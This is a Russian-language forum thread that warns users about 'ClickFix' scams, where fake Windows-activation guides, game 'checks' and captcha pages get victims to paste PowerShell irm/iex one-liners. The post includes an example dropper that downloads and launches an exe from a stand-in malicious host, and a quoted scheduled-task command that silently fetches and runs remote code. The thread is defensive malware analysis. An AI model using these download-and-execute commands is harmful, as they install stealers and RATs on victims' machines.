Загрузка...

(Click Fix) PowerShell Code in Windows activation and not only: how IEX and IWR methods help hackers

Thread in Virology created by Doklsi Feb 22, 2025. (bumped Jun 15, 2025) 1445 views

  1. Doklsi
    Doklsi Topic starter Feb 22, 2025 Ночной лолз - это ебаный даркнет 8376 Jun 26, 2021
    Всех приветствую, хотелось бы начать с небольшого предисловия. На форуме появляются темы из разряда активации Windows, и многие рекомендуют активировать его через cmd, уверяя, что все безопасно и ничего не подкачивается, но так ли это? Также были темы, где люди попадались на подобные решения, только уже в другом виде, но об этом мы поговорим позже.
    Пример такого ответа:​
    [IMG]
    Разберем что означает каждая из этих команд:
    irm - (Invoke Rest-method) - данный метод используется для получения содержимого с интернет ресурса, через него как раз подгружается другой вредоносный повершеллкод с ресурса, для подгрузки непосредственно малвари.
    iex - (Invoke-Expression) - выполняет полученную строку от команды выше, как код powershell.

    1. Код, подгружаемой строкой на скрине может выглядеть примерно так, очевидно, что это простой дрoпер, бывают вариации добавляющие путь дрoпа в исключения через аддпатчэкслюжен
    • Code
      $url = "http://malicious-site.com/payload.exe"
      $path = "$env:Temp\payload.exe"
      (New-Object System.Net.WebClient).DownloadFile($url, $path)
      Start-Process -FilePath $path
      Думаю понятно, давайте перейдем к реальным кейсам.

      1# Кейс
      К сожалению, материала у меня нет, так как я не мог физически встретить ситуацию, но условно она выглядит так, вы играете на паблике в любой игре, затем вас вызывают на проверку и говорят выполнить эту команду через cmd, затем там идёт обычный вывод, типа проверки, но после нее вы получали .NET щит ратку на устройство


      2# Кейс
      Это непосредственно активация, я буду рассматривать реальный недавний пример юзера этого форума, который наткнулся на это говно.
      Он гуглил как активировать виндовс без сторонних программ, в топе вылезла линк на статью на ресурсе vc.ru. Начало статьи выглядело примерно так
      [IMG]
      Как мы можем заметить, тут уже знакомые нам вариации, я выполнил данную команду в изолированной среде и запустил специальный скрипт, который используя инструмент Event Viewer Windows вытащил запросы Powershell (код - 4104) после выполнения, затемпрогнал их через тулзу для форензики для удобства. Что делала строка? Она выкачала повершеллкод, дрoпающий в темп файл MAS_d08aa00e-57b3-410a-8cb6-c65fe353c99d.cmd после его старта:
      Выцепилась следующая интересная строчка:
      Code
      New-ScheduledTaskAction -Execute powershell.exe -Argument -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iex (irm '130.0.235.2*2/0x55/3')"
      * - закрыл специально
      Она создавала запланированную задачу, которая выкачивала и запускала повершеллкод в скрытом режиме по линку 130.0.235.2*2/0x55/3
      [IMG]
      Заглянем в его содержимое [IMG]
      Как мы видим тут уже идёт реализация самого вредоноса, кому интересно его VT - https://www.virustotal.com/gui/file/8ad85e48a936a3c5dd0055304390502d676dce059ab77ce462b746d089f2470b/detection
      К сожалению, он сразу удалялся после выполнения, но я успел выхватить его дамп, на вид это обычный говно-*******, без какой-либо обфускации, отправляющий собранные данные в бота тг, написан крайне хуево и обсуждать здесь нечего
      [IMG]


      [IMG]

      Пример такого распространения через тикток
      [IMG]

      В данном случае команда уже подгружала ******* под названием Vidar
      [IMG]
      Кейс #3 - Капча на сайте
      Вы заходите на сайт, либо телеграм бота и вас просит пройти капчу, примеры:
      [IMG]
      [IMG]
      [IMG]

      Статья вышла небольшой, но просто предупреждение юзерам, что если нихуя не знаете - лучше ничего не вводить, либо пользоваться доверенными решениями, где вы точно уверены что ничего не подхватите. Спасибо за прочтение
     
    1. segfaultdream
      Doklsi, кабута зачем ты ломаешь мои способы пролива
    2. 3645483
      Doklsi, тоже эта залупа в шортсах попалась, пон
  2. Y4sperMaglot
    Code
    slmgr /skms kms.digiboy.ir
    slmgr /ipk ключ
    slmgr /ato
    А это безопасно? :sadhamster:
     
    1. View previous comments (1)
    2. Y4sperMaglot
      Doklsi, а можно как-то отследить запрос?
    3. Doklsi Topic starter
      Y4sperMaglot, любой сниффер трафика в помощь, но смысла заморачиваться нет с этим
  3. puffer2010
    puffer2010 Feb 22, 2025 Моментальная покупка TRX - https://lolz.live/threads/8610296/ 17,822 Mar 7, 2019
    Теперь еще больше параноик
     
  4. Awr2
    Awr2 Mar 10, 2025 0 Mar 10, 2025
    Попался на этот тип развода, судя по дампу оно получается стилит только аппдату?
     
    1. View previous comments (3)
    2. Cartier
      Doklsi, все же люди на начале скачки винды активируют винду обычно во дибилы чо они там варавать сабрались
    3. Doklsi Topic starter
      Cartier, пейлоудом может быть не только *******, а ратник, хвнц, резидентный лоудер, соксбот и так далее, которые будут продолжать функционировать в дальнейшем
    4. Cartier
      Doklsi, княлись нихуя не понял но очень интересно
  5. Onyx
    Onyx Mar 28, 2025 Banned 560 Jul 6, 2023
    теперь мне страшно
     
  6. Kuujou_Joutarou
    Kuujou_Joutarou Apr 2, 2025 Собираю деньги на чебурек 1/65 не оставьте меня без еды 5818 May 27, 2019
    Йоу йоу йоу спасибо узнал что такая хуйя есть, уже давно бы оратник словил повезло что через проверенных челов активировал :bowing:
     
  7. N0th1ngExtra
    N0th1ngExtra Jun 26, 2025 neverwillrise 3443 Feb 17, 2022
    Наконец-то хоть что то полезное
     
Loading...
Top